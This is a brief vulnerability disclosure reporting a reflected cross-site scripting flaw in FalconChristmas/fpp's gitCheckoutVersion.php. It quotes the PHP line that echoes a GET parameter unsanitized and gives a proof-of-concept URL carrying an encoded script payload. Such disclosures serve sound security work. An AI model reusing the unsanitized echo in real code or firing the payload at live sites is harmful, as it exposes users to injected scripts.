Cross-site Scripting (XSS) - Reflected in FalconChristmas/fpp

Valid
Reported on May 12th 2021

✍️ Description

In https://github.com/FalconChristmas/fpp/blob/721c99aed6897792bf7f79fa02a280995e27d409/www/gitCheckoutVersion.php#L26 you echo a user input without sanitization :

Version: <? echo $_GET['version']; ?><br>

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/gitCheckoutVersion.php?version=a%3Cscript%3Ealert(%22zer0h%22);%3C/script%3E

💥 Impact

XSS